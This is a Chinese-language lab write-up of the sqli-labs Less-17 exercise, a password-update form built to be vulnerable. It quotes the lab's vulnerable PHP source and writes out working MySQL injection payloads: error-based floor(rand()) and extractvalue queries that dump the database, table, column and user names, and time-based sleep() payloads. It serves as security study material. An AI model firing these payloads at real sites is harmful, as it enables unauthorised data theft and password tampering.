本文记录 SQL 注入的学习过程,资料为 SQLi
Less - 17: POST - Update Query - Error Based- String
测试漏洞
本关我们可以看到是一个修改密码的过程
username 输入 admin password 输入 pass'
显示错误信息
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1
可以看到admin” 说明在对密码的处理过程中使用的是” 。
源代码
$uname=check_input($_POST['uname']); $passwd=$_POST['passwd']; # check_input()中,对 username 进行各种转义的处理,所以此处不能使用 username 进行注入。 @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
在对密码的处理过程中使用的是” 。
接下来利用盲注进行注入。
报错中使用了 update 语句
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
Sqli-labs 实验笔记之Less-17 报错型 update 详解 https://www.xmanblog.net/2016/07/05/sqli-labs-less-17/
例句:修改users表中名为inputuser的数据
UPDATE users SET password = inputpass WHERE username = inputuser
在 命令行执行
获取数据库名
UPDATE users SET password = 'admin' WHERE password = (select 1 from (select count(*),(concat("~",database(),"~",floor(rand()*2)))name from information_schema.tables group by name)b);
获取表名
UPDATE users SET password = 'admin' WHERE password = (select 1 from (select count(*),(concat("~",(select table_name from information_schema.tables where table_schema=database() limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b);
获取列名
UPDATE users SET password = 'admin' WHERE password = (select 1 from (select count(*),(concat("~",(select column_name from information_schema.columns where table_name='users' limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b) ;
获取数据
UPDATE users SET password = 'admin' WHERE password = (select 1 from (select count(*),(concat("~",(select username from users limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b);
报错型盲注
uname=admin&passwd=11'and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&submit=Submit
显示 FUNCTION security.extractvalue does not exist
extractvalue() 函数不支持低版本 mysql
将@@version 换成你的子句就可以进行其他的注入了。
延时注入猜数据库
post 数据 uname=admin&passwd=11'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&submit=Submit # 或者 uname=admin&passwd=11'and If(left(database(),1)='s',1,sleep(5))#&submit=Submit # 数据库的第一位是 s
正确的时候可以直接登录,不正确的时候延时 5 秒。